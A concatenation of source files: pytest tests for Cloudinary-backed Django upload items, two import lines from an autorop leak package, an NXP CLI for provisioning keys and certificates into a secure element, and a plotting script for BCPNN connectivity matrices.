posixpath.join(self.resource_location, 'new_cfile_name_{}{{suffix}}.png'.format(storage.uid)),
file.name
)
def test_basename(self, storage):
assert storage.resource.basename == utils.get_target_filepath(
'new_cfile_name_{}{{suffix}}'.format(storage.uid),
storage.resource.basename
)
class TestFileItemDelete(TestFileFieldResourceDelete):
resource_class = CloudinaryFileItem
resource_location = 'collections/files/%Y-%m-%d'
collection_class = CloudinaryFileCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.resource = cls.resource_class()
storage.resource.attach_to(storage.collection)
with open(NATURE_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_name.jpg')
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.resource.delete_file()
yield
storage.resource.delete()
def test_file_not_exists(self, storage):
file_field = storage.resource.get_file_field()
with pytest.raises(cloudinary.exceptions.Error):
uploader.explicit(
storage.old_source_name,
type=file_field.type,
resource_type=file_field.resource_type
)
class TestFileItemEmpty(TestFileFieldResourceEmpty):
recource_class = CloudinaryFileItem
collection_class = CloudinaryFileCollection
@classmethod
def init_class(cls, storage):
collection = cls.collection_class.objects.create()
storage.resource = cls.recource_class()
storage.resource.attach_to(collection)
yield
collection.delete()
def test_path(self, storage):
pass
class TestMediaItem(CollectionItemMixin, CloudinaryFileResource):
resource_url = '/media/collections/files/%Y-%m-%d'
resource_location = 'collections/files/%Y-%m-%d'
resource_name = 'audio'
resource_extension = 'mp3'
resource_size = 2113939
resource_checksum = '4792f5f997f82f225299e98a1e396c7d7e479d10ffe6976f0b487361d729a15d'
owner_app_label = ''
owner_model_name = ''
owner_fieldname = ''
owner_class = None
file_field_name = 'file'
collection_class = CloudinaryCompleteCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.resource = CloudinaryMediaItem()
storage.resource.attach_to(storage.collection)
with open(AUDIO_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp)
storage.resource.save()
yield
storage.resource.delete_file()
storage.resource.delete()
storage.collection.delete()
def test_get_file_folder(self, storage):
assert storage.resource.get_file_folder() == self.resource_location
def test_display_name(self, storage):
assert storage.resource.display_name == self.resource_name
def test_item_type(self, storage):
assert storage.resource.item_type == 'media'
def test_type(self, storage):
file_field = storage.resource.get_file_field()
assert file_field.type == 'private'
assert file_field.resource_type == 'video'
def test_public_id(self, storage):
public_id = storage.resource.get_file().public_id
pattern = posixpath.join(self.resource_location, 'audio{suffix}')
assert public_id == utils.get_target_filepath(pattern, public_id)
def test_name(self, storage):
file_name = storage.resource.name
pattern = posixpath.join(self.resource_location, 'audio{suffix}')
assert file_name == utils.get_target_filepath(pattern, file_name)
def test_read(self, storage):
with storage.resource.open() as fp:
assert fp.read(4) == b'ID3\x03'
def test_as_dict(self, storage):
assert storage.resource.as_dict() == {
'id': 1,
'collectionId': 1,
'itemType': 'media',
'name': self.resource_name,
'extension': self.resource_extension,
'size': self.resource_size,
'caption': '{}.{}'.format(self.resource_name, self.resource_extension),
'order': 0,
'preview': render_to_string(
'paper_uploads/items/preview/file.html',
storage.resource.get_preview_context()
),
'url': storage.resource.get_file_url(),
'created': storage.resource.created_at.isoformat(),
'modified': storage.resource.modified_at.isoformat(),
'uploaded': storage.resource.uploaded_at.isoformat(),
}
def test_file_supported(self, storage):
with open(DOCUMENT_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is False
with open(NATURE_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is False
with open(MEDITATION_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is False
with open(AUDIO_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
@pytest.mark.django_db
class TestMediaItemAttach(TestFileFieldResourceAttach):
resource_class = CloudinaryMediaItem
resource_size = 2113939
resource_checksum = '4792f5f997f82f225299e98a1e396c7d7e479d10ffe6976f0b487361d729a15d'
collection_class = CloudinaryMediaCollection
@contextmanager
def get_resource(self):
collection = self.collection_class.objects.create()
resource = self.resource_class()
resource.attach_to(collection)
try:
yield resource
finally:
resource.delete_file()
collection.delete()
def test_file(self):
with self.get_resource() as resource:
with open(AUDIO_FILEPATH, 'rb') as fp:
resource.attach_file(fp)
assert resource.basename == 'audio'
assert resource.extension == 'mp3'
assert resource.size == self.resource_size
assert resource.checksum == self.resource_checksum
def test_django_file(self):
with self.get_resource() as resource:
with open(AUDIO_FILEPATH, 'rb') as fp:
file = File(fp, name='milky-way-nasa.jpg')
resource.attach_file(file)
assert resource.basename == 'milky-way-nasa'
assert resource.extension == 'mp3'
assert resource.size == self.resource_size
assert resource.checksum == self.resource_checksum
def test_override_name(self):
with self.get_resource() as resource:
with open(AUDIO_FILEPATH, 'rb') as fp:
resource.attach_file(fp, name='overwritten.jpg')
assert resource.basename == 'overwritten'
assert resource.extension == 'mp3'
def test_override_django_name(self):
with self.get_resource() as resource:
with open(AUDIO_FILEPATH, 'rb') as fp:
file = File(fp, name='not_used.png')
resource.attach_file(file, name='overwritten.jpg')
assert resource.basename == 'overwritten'
assert resource.extension == 'mp3'
def test_wrong_extension(self):
with self.get_resource() as resource:
with open(AUDIO_FILEPATH, 'rb') as fp:
resource.attach_file(fp, name='overwritten.gif')
assert resource.basename == 'overwritten'
assert resource.extension == 'mp3'
def test_file_position_at_end(self):
with self.get_resource() as resource:
with open(AUDIO_FILEPATH, 'rb') as fp:
resource.attach_file(fp)
assert fp.tell() == self.resource_size
def test_unsupported_file(self):
with self.get_resource() as resource:
with open(NASA_FILEPATH, 'rb') as fp:
with pytest.raises(UnsupportedFileError):
resource.attach_file(fp)
class TestMediaItemRename(TestFileFieldResourceRename):
resource_class = CloudinaryMediaItem
resource_location = 'collections/files/%Y-%m-%d'
collection_class = CloudinaryMediaCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.uid = get_random_string(5)
storage.resource = cls.resource_class()
storage.resource.attach_to(storage.collection)
with open(AUDIO_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_cmedia_name_{}.mp3'.format(storage.uid))
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.resource.rename_file('new_cmedia_name_{}.ogg'.format(storage.uid))
yield
storage.resource.delete_file()
storage.resource.delete()
def test_old_file_exists(self, storage):
file = storage.resource.get_file()
with pytest.raises(cloudinary.exceptions.Error):
uploader.explicit(
storage.old_source_name,
type=file.resource.type,
resource_type=file.resource.resource_type
)
def test_new_file_exists(self, storage):
file = storage.resource.get_file()
uploader.explicit(
file.name,
type=file.resource.type,
resource_type=file.resource.resource_type
)
def test_old_file_name(self, storage):
assert storage.old_source_name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'old_cmedia_name_{}{{suffix}}'.format(storage.uid)),
storage.old_source_name
)
def test_new_file_name(self, storage):
file = storage.resource.get_file()
assert file.name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'new_cmedia_name_{}{{suffix}}'.format(storage.uid)),
file.name
)
def test_basename(self, storage):
assert storage.resource.basename == utils.get_target_filepath(
'new_cmedia_name_{}{{suffix}}'.format(storage.uid),
storage.resource.basename
)
def test_extension(self, storage):
assert storage.resource.extension == 'mp3'
class TestMediaItemDelete(TestFileFieldResourceDelete):
resource_class = CloudinaryMediaItem
resource_location = 'collections/files/%Y-%m-%d'
collection_class = CloudinaryMediaCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.resource = cls.resource_class()
storage.resource.attach_to(storage.collection)
with open(AUDIO_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_name.jpg')
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.resource.delete_file()
yield
storage.resource.delete()
def test_file_name(self, storage):
assert storage.old_source_name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'old_name{suffix}'),
storage.old_source_name
)
def test_file_not_exists(self, storage):
file_field = storage.resource.get_file_field()
with pytest.raises(cloudinary.exceptions.Error):
uploader.explicit(
storage.old_source_name,
type=file_field.type,
resource_type=file_field.resource_type
)
class TestMediaItemEmpty(TestFileFieldResourceEmpty):
    resource_class = CloudinaryMediaItem
    collection_class = CloudinaryMediaCollection
    @classmethod
    def init_class(cls, storage):
        collection = cls.collection_class.objects.create()
        storage.resource = cls.resource_class()
storage.resource.attach_to(collection)
yield
collection.delete()
def test_path(self, storage):
pass
class TestImageItem(CollectionItemMixin, CloudinaryFileResource):
resource_url = 'collections/images/%Y-%m-%d'
resource_location = 'collections/images/%Y-%m-%d'
resource_name = 'Nature Tree'
resource_extension = 'jpg'
resource_size = 672759
resource_checksum = 'e3a7f0318daaa395af0b84c1bca249cbfd46b9994b0aceb07f74332de4b061e1'
owner_app_label = ''
owner_model_name = ''
owner_fieldname = ''
owner_class = None
file_field_name = 'file'
collection_class = CloudinaryCompleteCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.resource = CloudinaryImageItem()
storage.resource.attach_to(storage.collection)
with open(NATURE_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp)
storage.resource.save()
yield
storage.resource.delete_file()
storage.resource.delete()
storage.collection.delete()
def test_get_file_folder(self, storage):
assert storage.resource.get_file_folder() == self.resource_location
def test_item_type(self, storage):
assert storage.resource.item_type == 'image'
def test_type(self, storage):
file_field = storage.resource.get_file_field()
assert file_field.type == 'private'
assert file_field.resource_type == 'image'
def test_public_id(self, storage):
public_id = storage.resource.get_file().public_id
pattern = posixpath.join(self.resource_location, 'Nature_Tree{suffix}')
assert public_id == utils.get_target_filepath(pattern, public_id)
def test_name(self, storage):
file_name = storage.resource.name
pattern = posixpath.join(self.resource_location, 'Nature_Tree{suffix}')
assert file_name == utils.get_target_filepath(pattern, file_name)
def test_as_dict(self, storage):
assert storage.resource.as_dict() == {
'id': 1,
'collectionId': 1,
'itemType': 'image',
'name': self.resource_name,
'extension': self.resource_extension,
'size': self.resource_size,
'width': 1534,
'height': 2301,
'cropregion': '',
'title': '',
'description': '',
'caption': '{}.{}'.format(self.resource_name, self.resource_extension),
'order': 0,
'preview': render_to_string(
'paper_uploads_cloudinary/items/preview/image.html',
storage.resource.get_preview_context()
),
'url': storage.resource.get_file_url(),
'created': storage.resource.created_at.isoformat(),
'modified': storage.resource.modified_at.isoformat(),
'uploaded': storage.resource.uploaded_at.isoformat(),
}
def test_width(self, storage):
assert storage.resource.width == 1534
def test_height(self, storage):
assert storage.resource.height == 2301
def test_file_supported(self, storage):
with open(DOCUMENT_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is False
with open(NATURE_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
with open(MEDITATION_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
with open(AUDIO_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is False
@pytest.mark.django_db
class TestImageItemAttach(TestImageFieldResourceAttach):
resource_class = CloudinaryImageItem
collection_class = CloudinaryCompleteCollection
@contextmanager
def get_resource(self):
collection = self.collection_class.objects.create()
resource = self.resource_class()
resource.attach_to(collection)
try:
yield resource
finally:
resource.delete_file()
collection.delete()
def test_unsupported_file(self):
with self.get_resource() as resource:
with open(DOCUMENT_FILEPATH, 'rb') as fp:
with pytest.raises(UnsupportedFileError):
resource.attach_file(fp)
class TestImageItemRename(TestImageFieldResourceRename):
resource_class = CloudinaryImageItem
resource_location = 'collections/images/%Y-%m-%d'
collection_class = CloudinaryCompleteCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.uid = get_random_string(5)
storage.resource = cls.resource_class()
storage.resource.attach_to(storage.collection)
with open(CALLIPHORA_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_cimage_name_{}.jpg'.format(storage.uid))
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.resource.rename_file('new_cimage_name_{}.png'.format(storage.uid))
yield
storage.resource.delete_file()
storage.resource.delete()
def test_old_file_exists(self, storage):
file = storage.resource.get_file()
with pytest.raises(cloudinary.exceptions.Error):
uploader.explicit(
storage.old_source_name,
type=file.resource.type,
resource_type=file.resource.resource_type
)
def test_new_file_exists(self, storage):
file = storage.resource.get_file()
uploader.explicit(
file.name,
type=file.resource.type,
resource_type=file.resource.resource_type
)
def test_old_file_name(self, storage):
assert storage.old_source_name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'old_cimage_name_{}{{suffix}}'.format(storage.uid)),
storage.old_source_name
)
def test_new_file_name(self, storage):
file = storage.resource.get_file()
assert file.name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'new_cimage_name_{}{{suffix}}'.format(storage.uid)),
file.name
)
def test_basename(self, storage):
assert storage.resource.basename == utils.get_target_filepath(
'new_cimage_name_{}{{suffix}}'.format(storage.uid),
storage.resource.basename
)
def test_extension(self, storage):
assert storage.resource.extension == 'jpg'
class TestImageItemDelete(TestImageFieldResourceDelete):
resource_class = CloudinaryImageItem
resource_location = 'collections/images/%Y-%m-%d'
collection_class = CloudinaryCompleteCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.resource = cls.resource_class()
storage.resource.attach_to(storage.collection)
with open(CALLIPHORA_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_name.jpg')
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.resource.delete_file()
yield
storage.resource.delete()
def test_file_name(self, storage):
assert storage.old_source_name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'old_name{suffix}'),
storage.old_source_name
)
def test_file_not_exists(self, storage):
file_field = storage.resource.get_file_field()
with pytest.raises(cloudinary.exceptions.Error):
uploader.explicit(
storage.old_source_name,
type=file_field.type,
resource_type=file_field.resource_type
)
class TestImageItemEmpty(TestImageFieldResourceEmpty):
    resource_class = CloudinaryImageItem
    collection_class = CloudinaryCompleteCollection
    @classmethod
    def init_class(cls, storage):
        collection = cls.collection_class.objects.create()
        storage.resource = cls.resource_class()
storage.resource.attach_to(collection)
yield
collection.delete()
def test_path(self, storage):
pass
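The attach-test classes above all build resources through the same contextmanager pattern (see `get_resource`), whose `try`/`finally` around the `yield` guarantees that cleanup runs even when a test body raises. A stripped-down sketch with a dummy class (no Django, no Cloudinary; the names here are illustrative only):

```python
from contextlib import contextmanager

class DummyResource:
    """Stand-in for a collection item; only tracks cleanup state."""
    def __init__(self):
        self.file_deleted = False

    def delete_file(self):
        self.file_deleted = True

@contextmanager
def resource_fixture(resource_cls):
    resource = resource_cls()
    try:
        yield resource
    finally:
        # runs on normal exit *and* when the with-body raises
        resource.delete_file()
```

This is why a failing assertion inside the `with` block still leaves no orphaned remote file behind.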
# File: autorop/leak/__init__.py (repo: Tanson/autorop, license: MIT)
from autorop.leak.puts import puts
from autorop.leak.printf import printf
# File: src/cli/cli_set.py (repo: foundriesio/plug-and-trust-ssscli, license: Apache-2.0)
#
# Copyright 2018-2020 NXP
# SPDX-License-Identifier: Apache-2.0
#
#
"""License text"""
import sys
import click
import func_timeout
from sss.setkey import Set
from sss.policy import Policy
import sss.sss_api as apis
from .cli import set, pass_context, session_open, session_close, log_traceback, TIME_OUT # pylint: disable=redefined-builtin
@set.group()
@pass_context
def ecc(cli_ctx):
"""Set ECC Keys"""
cli_ctx.vlog("Set ECC Keys")
@set.group()
@pass_context
def rsa(cli_ctx):
"""Set RSA Keys"""
cli_ctx.vlog("Set RSA Keys")
@set.command('hmac', short_help='Set HMAC Keys')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@pass_context
def hmac(cli_ctx, keyid, key):
""" Set HMAC Keys \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be in file or raw key in DER or HEX format\n
"""
try:
keyid = int(keyid, 16)
cli_ctx.log("Injecting HMAC Key at KeyID = 0x%08X" % keyid)
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_hmac_key, (keyid, key, None))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected HMAC Key at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject HMAC Key at KeyID 0x%08X " % (keyid,))
ret_value = 1
sys.exit(ret_value)
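Every command above converts its `keyid` argument with `int(keyid, 16)` and documents the expected form ("32bit Key ID. Should be in hex format. Example: 20E8A001"). A standalone validator sketching that contract (the function name is illustrative, not part of this CLI):

```python
def parse_keyid(text):
    """Parse a 32-bit key ID given in hex, e.g. '20E8A001'.

    A '0x' prefix is also accepted, since int(..., 16) allows it.
    """
    value = int(text, 16)
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("key ID does not fit in 32 bits: %s" % text)
    return value
```

The range check is the part `int()` alone does not give you: it rejects values that would not fit the 32-bit key ID the docstrings describe.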
@set.command('aes', short_help='Set AES Keys')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def aes(cli_ctx, keyid, key, policy_name):
""" Set AES Keys \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be in file or raw key in DER or HEX format\n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting AES Key at KeyID = 0x%08X" % keyid)
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_sym_key,
(keyid, key, policy))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected AES Key at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject AES Key at KeyID 0x%08X " % (keyid,))
ret_value = 1
sys.exit(ret_value)
@set.command('cert', short_help='Set Certificate')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@click.option('--format', default='',
help="Input certificate format. TEXT can be \"DER\" or \"PEM\"")
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def cert(cli_ctx, keyid, key, format, policy_name):
""" Set Certificate \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be raw certificate (DER format) or in file.
For file, by default filename with extension .pem and .cer considered
as PEM format and others as DER format.\n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting Certificate at KeyID = 0x%08X" % keyid)
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_cert,
(keyid, key, policy, format))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected Certificate at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject Certificate at KeyID 0x%08X "
% (keyid,))
ret_value = 1
sys.exit(ret_value)
@set.command('bin', short_help='Set Binary')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('data', type=str, metavar='data')
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def bin(cli_ctx, keyid, data, policy_name):
""" Set Certificate \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
data = Can be raw binary or in file \n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting Binary at KeyID = 0x%08X" % keyid)
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_bin,
(keyid, data, policy))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected Binary at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject Binary at KeyID 0x%08X "
% (keyid,))
ret_value = 1
sys.exit(ret_value)
@ecc.command('pub', short_help='Set ECC Public Keys')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@click.option('--format', default='',
help="Input key format. TEXT can be \"DER\" or \"PEM\"")
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def pub(cli_ctx, keyid, key, format, policy_name):
""" Set ECC Public Keys \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be raw key (DER format) or in file.
For file, by default filename with extension .pem considered as PEM format
and others as DER format.\n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting ECC Public Key at KeyID = 0x%08X" % (keyid,))
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_ecc_pub_key,
(keyid, key, policy, format))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected ECC Public Key at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject ECC Public Key at KeyID 0x%08X "
% (keyid,))
ret_value = 1
sys.exit(ret_value)
@ecc.command('pair', short_help='Set ECC Key pair')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@click.option('--format', default='',
help="Input key format. TEXT can be \"DER\" or \"PEM\"")
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def pair(cli_ctx, keyid, key, format, policy_name):
""" Set ECC Key pair \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be raw key (DER format) or in file.
For file, by default filename with extension .pem considered as PEM format
and others as DER format.\n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting ECC Key Pair at KeyID = 0x%08X" % (keyid,))
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_ecc_key_pair,
(keyid, key, policy, format))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected ECC Key Pair at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject ECC Pair at KeyID 0x%08X "
% (keyid,))
ret_value = 1
sys.exit(ret_value)
@rsa.command('pub', short_help='Set RSA Public Keys')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@click.option('--format', default='',
help="Input key format. TEXT can be \"DER\" or \"PEM\"")
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def pub(cli_ctx, keyid, key, format, policy_name):
""" Set RSA Public Keys \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be raw key (DER format) or in file.
For file, by default filename with extension .pem considered as PEM format
and others as DER format.\n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting RSA Public Key at KeyID = 0x%08X" % keyid)
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_rsa_pub_key,
(keyid, key, policy, format))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected RSA Public Key at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject RSA Public Key at KeyID 0x%08X "
% (keyid,))
ret_value = 1
sys.exit(ret_value)
@rsa.command('pair', short_help='Set RSA Key Pair')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@click.option('--format', default='',
help="Input key format. TEXT can be \"DER\" or \"PEM\"")
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def pair(cli_ctx, keyid, key, format, policy_name):
""" Set RSA Key Pair \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be raw key (DER format) or in file.
For file, by default filename with extension .pem considered as PEM format
and others as DER format.\n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting RSA Key Pair at KeyID = 0x%08X" % keyid)
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_rsa_key_pair,
(keyid, key, policy, format))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected RSA Key Pair at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject RSA Pair at KeyID 0x%08X "
% (keyid,))
ret_value = 1
sys.exit(ret_value)
# File: plots/bernstein_connectivity_matrices.py (repo: h-mayorquin/attractor_sequences, license: MIT)
import sys
sys.path.append('../')
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import seaborn as sns
from network import Protocol, BCPNNFast, NetworkManager
from analysis_functions import calculate_recall_success_sequences
from connectivity_functions import create_artificial_manager
from plotting_functions import set_text
sns.set(font_scale=3.0)
normal_plot = True
overlaped_plot = True
overloaded_pot = True
sigma = 0
if normal_plot:
# Patterns parameters
hypercolumns = 4
minicolumns = 10
n_patterns = 10
dt = 0.001
# Manager properties
dt = 0.001
T_recalling = 5.0
values_to_save = ['o']
# Protocol
training_time = 0.1
inter_sequence_interval = 3.0
inter_pulse_interval = 0.0
epochs = 3
tau_p = 100.0
# Build the network
nn = BCPNNFast(hypercolumns, minicolumns, sigma=0, tau_p=tau_p)
# Build the manager
manager = NetworkManager(nn=nn, dt=dt, values_to_save=values_to_save)
# Build the protocol
# Build the protocol for training
protocol = Protocol()
patterns_indexes = [i for i in range(n_patterns)]
protocol.simple_protocol(patterns_indexes, training_time=training_time, inter_pulse_interval=inter_pulse_interval,
inter_sequence_interval=inter_sequence_interval, epochs=epochs)
# Train
epoch_history = manager.run_network_protocol(protocol=protocol, verbose=True)
# Now plotting
w = nn.w
fig = plt.figure(figsize=(16, 12))
ax = fig.add_subplot(111)
w = w[:nn.minicolumns, :nn.minicolumns]
aux_max = np.max(np.abs(w))
cmap = 'coolwarm'
im = ax.imshow(w, cmap=cmap, interpolation='None', vmin=-aux_max, vmax=aux_max)
divider = make_axes_locatable(ax)
cax = divider.append_axes('right', size='5%', pad=0.05)
ax.get_figure().colorbar(im, ax=ax, cax=cax)
# Add text numbers
for i in range(n_patterns - 1):
coordinate_from = i
coordinate_to = i + 1
set_text(ax, coordinate_from, coordinate_to, fontsize=25)
# Editing
ax.grid()
ax.set_title('Simple sequence')
ax.set_xlabel('Input')
ax.set_ylabel('Output')
